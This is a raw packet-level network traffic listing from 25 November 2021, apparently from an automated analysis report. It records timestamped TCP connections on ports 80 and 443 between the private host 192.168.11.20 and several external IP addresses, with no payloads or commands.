                                                                                                                        Nov 25, 2021 12:57:48.440229893 CET4982380192.168.11.20172.67.164.153
                                                                                                                        Nov 25, 2021 12:57:48.440284967 CET4982380192.168.11.20172.67.164.153
                                                                                                                        Nov 25, 2021 12:57:48.449387074 CET8049823172.67.164.153192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:48.942645073 CET4982380192.168.11.20172.67.164.153
                                                                                                                        Nov 25, 2021 12:57:48.952918053 CET8049823172.67.164.153192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:48.953178883 CET4982380192.168.11.20172.67.164.153
                                                                                                                        Nov 25, 2021 12:57:53.957892895 CET4982480192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:57:53.969721079 CET80498243.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:53.969901085 CET4982480192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:57:53.969954967 CET4982480192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:57:53.981332064 CET80498243.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:53.981384993 CET80498243.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:53.981420994 CET80498243.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:53.981712103 CET4982480192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:57:53.981765032 CET4982480192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:57:53.993021965 CET80498243.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.224369049 CET4982580192.168.11.20136.143.191.204
                                                                                                                        Nov 25, 2021 12:58:04.395541906 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.395772934 CET4982580192.168.11.20136.143.191.204
                                                                                                                        Nov 25, 2021 12:58:04.395824909 CET4982580192.168.11.20136.143.191.204
                                                                                                                        Nov 25, 2021 12:58:04.573025942 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.573091030 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.573141098 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.573188066 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.573224068 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:04.573457003 CET4982580192.168.11.20136.143.191.204
                                                                                                                        Nov 25, 2021 12:58:04.573668957 CET4982580192.168.11.20136.143.191.204
                                                                                                                        Nov 25, 2021 12:58:04.573966980 CET4982580192.168.11.20136.143.191.204
                                                                                                                        Nov 25, 2021 12:58:04.744530916 CET8049825136.143.191.204192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:24.825898886 CET4982680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:58:24.837698936 CET80498263.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:24.837869883 CET4982680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:58:24.837934971 CET4982680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:58:24.849312067 CET80498263.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:24.849364996 CET80498263.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:24.849401951 CET80498263.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:24.849699974 CET4982680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:58:24.849778891 CET4982680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:58:24.861171961 CET80498263.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:40.649848938 CET4982780192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:58:40.925158978 CET8049827203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:40.925379038 CET4982780192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:58:40.925452948 CET4982780192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:58:41.202750921 CET8049827203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:41.202814102 CET8049827203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:58:41.203097105 CET4982780192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:58:41.203178883 CET4982780192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:58:41.478652954 CET8049827203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:21.082148075 CET4982880192.168.11.20192.0.78.25
                                                                                                                        Nov 25, 2021 12:59:21.090945005 CET8049828192.0.78.25192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:21.091240883 CET4982880192.168.11.20192.0.78.25
                                                                                                                        Nov 25, 2021 12:59:21.091321945 CET4982880192.168.11.20192.0.78.25
                                                                                                                        Nov 25, 2021 12:59:21.100228071 CET8049828192.0.78.25192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:21.100280046 CET8049828192.0.78.25192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:21.100316048 CET8049828192.0.78.25192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:21.100600958 CET4982880192.168.11.20192.0.78.25
                                                                                                                        Nov 25, 2021 12:59:21.100662947 CET4982880192.168.11.20192.0.78.25
                                                                                                                        Nov 25, 2021 12:59:21.109532118 CET8049828192.0.78.25192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.440660954 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.542753935 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.542958975 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.543008089 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.644032955 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648669958 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648755074 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648819923 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648866892 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648927927 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648988008 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.648997068 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.649049997 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.649060965 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.649115086 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.649175882 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.649194002 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.649240971 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.649274111 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.649333000 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.649451971 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.649501085 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.750144958 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750267982 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750318050 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750368118 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750380039 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.750415087 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750428915 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.750463963 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750510931 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750539064 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.750560045 CET8049829198.185.159.144192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:26.750577927 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.750694036 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:26.750731945 CET4982980192.168.11.20198.185.159.144
                                                                                                                        Nov 25, 2021 12:59:31.681031942 CET4983080192.168.11.2066.29.140.185
                                                                                                                        Nov 25, 2021 12:59:31.834472895 CET804983066.29.140.185192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:31.834758997 CET4983080192.168.11.2066.29.140.185
                                                                                                                        Nov 25, 2021 12:59:31.834853888 CET4983080192.168.11.2066.29.140.185
                                                                                                                        Nov 25, 2021 12:59:31.987791061 CET804983066.29.140.185192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:32.055282116 CET804983066.29.140.185192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:32.055335999 CET804983066.29.140.185192.168.11.20
                                                                                                                        Nov 25, 2021 12:59:32.055500984 CET4983080192.168.11.2066.29.140.185
                                                                                                                        Nov 25, 2021 12:59:33.841420889 CET4983080192.168.11.2066.29.140.185
                                                                                                                        Nov 25, 2021 12:59:33.994374037 CET804983066.29.140.185192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:06.736754894 CET4983280192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:07.739619017 CET4983280192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:09.754771948 CET4983280192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:13.769447088 CET4983280192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:21.783281088 CET4983280192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:27.801012039 CET4983380192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:28.813062906 CET4983380192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:30.487730980 CET4983480192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:30.828107119 CET4983380192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:31.499881983 CET4983480192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:33.514975071 CET4983480192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:34.842761040 CET4983380192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:37.529650927 CET4983480192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:42.856563091 CET4983380192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:45.543668985 CET4983480192.168.11.20116.62.216.226
                                                                                                                        Nov 25, 2021 13:00:58.931627035 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.943512917 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.943850994 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.945292950 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.945389986 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.945430994 CET4983680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.956779957 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.956846952 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.956881046 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.956912994 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.956954002 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.956969976 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957003117 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957125902 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.957154989 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957212925 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957247019 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957278013 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957299948 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.957483053 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.957732916 CET80498363.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.957855940 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.958010912 CET4983680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.958096027 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.958116055 CET4983680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.968586922 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.968653917 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.968687057 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.968760967 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.968806982 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.968883991 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.968949080 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.968992949 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969140053 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.969160080 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.969224930 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969422102 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.969480038 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969547987 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969582081 CET80498353.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969643116 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.969707012 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.969724894 CET4983580192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.969820023 CET80498363.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969938040 CET80498363.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.969966888 CET80498363.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:00:58.970156908 CET4983680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.970207930 CET4983680192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 13:00:58.981561899 CET80498363.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.001957893 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.002039909 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.002211094 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.035404921 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.035427094 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.260420084 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.260648012 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.268867970 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.268888950 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.269191027 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.269377947 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.271553993 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.311882973 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.480285883 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.480362892 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.480473995 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.480528116 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.480540991 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.480551958 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.480560064 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.480566978 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.480581999 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.480679989 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590058088 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.590265989 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590271950 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590313911 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590317965 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590368986 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590375900 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.590424061 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590431929 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.590564966 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.590641975 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590647936 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590689898 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590738058 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590743065 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.590836048 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.590884924 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.591001034 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.678180933 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.678353071 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.678359032 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.678411007 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.678416967 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.678419113 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.678428888 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700125933 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.700248003 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.700310946 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700356960 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700404882 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700409889 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700503111 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700510979 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.700547934 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.700552940 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700557947 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700685978 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700691938 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.700738907 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700788021 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700836897 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700839043 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.700934887 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.742508888 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.742683887 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.742769003 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.788275957 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.788475990 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.788507938 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.788516998 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.788527012 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810053110 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.810203075 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810235977 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810249090 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810259104 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810283899 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810467958 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.810642004 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810668945 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.810702085 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811297894 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.811436892 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811475992 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.811481953 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811618090 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811651945 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.811707020 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811736107 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.811779022 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811814070 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.811870098 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811892033 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.811966896 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812087059 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812189102 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.812408924 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812468052 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812489033 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812514067 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812524080 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.812561035 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.812594891 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.812733889 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.853171110 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.853322983 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.853411913 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.853455067 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.853492022 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.853589058 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.853625059 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.898735046 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.898964882 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.898996115 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.922796965 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.922986031 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.922997952 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.923080921 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.923163891 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.923192024 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.923221111 CET44349837107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:12.923227072 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:12.923401117 CET49837443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:15.630872011 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:15.911901951 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:15.912231922 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:15.913723946 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:15.913800955 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:15.913960934 CET4983980192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.188790083 CET8049839203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.189142942 CET4983980192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.189246893 CET4983980192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.195628881 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195693970 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195735931 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195777893 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195851088 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.195884943 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195935965 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195977926 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.195983887 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.196019888 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.196060896 CET8049838203.170.80.250192.168.11.20
